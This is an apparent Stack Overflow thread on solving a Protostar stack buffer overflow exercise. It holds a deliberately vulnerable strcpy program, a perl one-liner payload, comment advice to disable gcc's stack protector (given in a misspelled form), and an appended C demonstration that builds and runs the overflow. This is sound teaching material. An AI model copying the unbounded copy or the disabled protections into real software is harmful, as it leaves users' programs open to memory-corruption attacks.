
I have seen some buffer overflow code, but I cannot overflow it. Is there any gcc option to compile it with? Or is there anything wrong with the code?

The code is:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* errx() is declared here, not in the headers above */

int main(int argc, char **argv)
{
     volatile int modified;   /* volatile so the compiler cannot cache it in a register */
     char buffer[64];

     if(argc == 1) {
          errx(1, "please specify an argument\n");
     }

     modified = 0;
     /* Deliberately unbounded copy: argv[1] longer than 64 bytes runs past buffer */
     strcpy(buffer, argv[1]);

     if(modified == 0x61626364) {
            printf("you have correctly got the variable to the right value\n");
     } else {
            printf("Try again, you got 0x%08x\n", modified);
     }
     return 0;
}

and I am trying to run it this way:
perl -e 'print "A"x64 . "dcba"' | xargs ./main

M.Fooladgar
  • This is notoriously tricky to get right without looking at the generated code. What are you getting? Does the process crash? – cnicutar Apr 29 '15 at 11:11
  • Overflowing `buffer` will write to the memory following it, but `modified` is probably in the memory preceding it (depending on the compiler). – interjay Apr 29 '15 at 11:13
  • This is a ctf challenge [here](http://exploit-exercises.com/protostar/stack1) is the question – M.Fooladgar Apr 29 '15 at 11:13
  • @interjay: Do you know of any compiler that can compile this? Or a gcc option? – M.Fooladgar Apr 29 '15 at 11:14
  • Maybe try to overflow it while putting it inside a struct. As far as I understand all compilers will keep the struct order since you might count on it when coding. – Erez breiman Apr 29 '15 at 11:23
  • So what output did you get? It works fine on cygwin gcc. – molbdnilo Apr 29 '15 at 11:35
  • My result is `Try again, you got 0x00000000`, but it should be `you have correctly got the variable to the right value\n`. I'm using Debian. – M.Fooladgar Apr 29 '15 at 11:41
  • @M.Fooladgar How are you compiling? Have you tried feeding it a longer string? Perhaps your stack is padded. – molbdnilo Apr 29 '15 at 11:51
  • @molbdnilo: Yes, and the result is: `*** stack smashing detected ***: ./level5 terminated`. The compile command is simply `gcc main.c -o main`. The gcc version is `4.8.2`. – M.Fooladgar Apr 29 '15 at 11:52
  • @M.Fooladgar You need to disable the "smash detection". `-f-no-stack-protector`, I think. The zeros are stored between the variables so overruns can be detected. – molbdnilo Apr 29 '15 at 11:57

1 Answer

You need to know:

  1. The stack memory layout and the address difference between the variables `modified` and `buffer`. You can solve it by finding the offset between `modified` and `buffer` as `(char *)&modified - (char *)buffer`.
  2. Your machine's endianness. I have used the Stack Overflow answer for this purpose.

The linked demo shows how to run the modified code, which serves the purpose of determining the correct argument as well as smashing the stack. The first demo provides you with the argument that you can feed to the second demo.

Abhijit
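The two ingredients the answer names (the byte offset from `buffer` to `modified`, and the host byte order for the four bytes of `0x61626364`) can be checked in code. The following is an added example, not code from the question, the answer or the Protostar challenge: `host_is_little_endian`, `local_offset`, `build_payload`, `struct frame` and `smash_struct` are names chosen here. `local_offset` computes the difference the answer describes for two ordinary locals; its sign and size are whatever your compiler decided, which is exactly why the asker's Debian build printed `0x00000000`. `struct frame` is the workaround suggested in the comments: members of a struct are laid out in declaration order, so the overflow reaches `modified` regardless of how the compiler orders stack locals. The copy is written by hand with the same unbounded semantics as `strcpy` so that a fortified `strcpy` wrapper does not abort the demonstration. For the real challenge binary you still need the compiler not to reorder the locals and to build with the stack protector disabled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example; helper names and the struct layout are illustrative. */

/* Byte order of the host: the compare `modified == 0x61626364` reads the
 * four bytes in host order, so the payload must store them in host order. */
static int host_is_little_endian(void)
{
    uint32_t probe = 0x01020304u;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 0x04;
}

/* The offset the answer tells you to compute. Sign and size depend on how the
 * compiler placed the two locals; a negative or large value means an overflow
 * of `buffer` cannot reach `modified` at all. */
static ptrdiff_t local_offset(void)
{
    volatile int modified = 0;
    char buffer[64] = {0};
    return (char *)&modified - (char *)buffer;
}

/* `offset` filler bytes followed by `value` in host byte order, NUL-terminated.
 * strcpy stops at the first NUL, so a value containing a zero byte is rejected.
 * Returns the payload length (excluding the terminator), or 0 on failure. */
static size_t build_payload(char *out, size_t cap, size_t offset, uint32_t value)
{
    size_t len = offset + sizeof value;
    if (cap < len + 1)
        return 0;
    memset(out, 'A', offset);
    memcpy(out + offset, &value, sizeof value);   /* host order */
    out[len] = '\0';
    for (size_t i = 0; i < len; i++)
        if (out[i] == '\0')
            return 0;                             /* embedded NUL would truncate */
    return len;
}

/* Deterministic layout: struct members keep declaration order, so 64 bytes of
 * filler land exactly on `modified`. `spare` gives the terminating NUL a home
 * inside the struct (sizeof is padded to 72), so no stack canary is touched. */
struct frame {
    char buffer[64];
    volatile int modified;
    char spare;
};

static int smash_struct(const char *arg)
{
    struct frame f;
    f.modified = 0;
    /* Unbounded byte-by-byte copy with strcpy semantics, written out so that a
     * _FORTIFY_SOURCE strcpy wrapper does not abort before the overflow happens. */
    volatile char *dst = f.buffer;
    while ((*dst++ = *arg++) != '\0') { }
    return f.modified;
}

/* Build the 68-byte payload ("A" x 64 followed by 0x61626364 in host order) and
 * run it against the struct layout; returns the value `modified` ends up with. */
static int run_demo(void)
{
    char payload[80];
    if (build_payload(payload, sizeof payload, 64, 0x61626364u) != 68)
        return -1;
    return smash_struct(payload);
}

int main(void)
{
    char payload[80];
    size_t n = build_payload(payload, sizeof payload, 64, 0x61626364u);
    printf("host is %s-endian; locals: &modified - buffer = %td bytes\n",
           host_is_little_endian() ? "little" : "big", local_offset());
    printf("payload is %zu bytes, last four are \"%.4s\"\n", n, payload + 64);
    printf("struct layout: modified = 0x%08x\n", (unsigned)run_demo());
    return 0;
}
```

On a little-endian machine the last four payload bytes are `dcba`, which is why the question's perl one-liner appends `"dcba"` rather than `"abcd"`; on a big-endian host `build_payload` emits `abcd` instead, so the same code works on both.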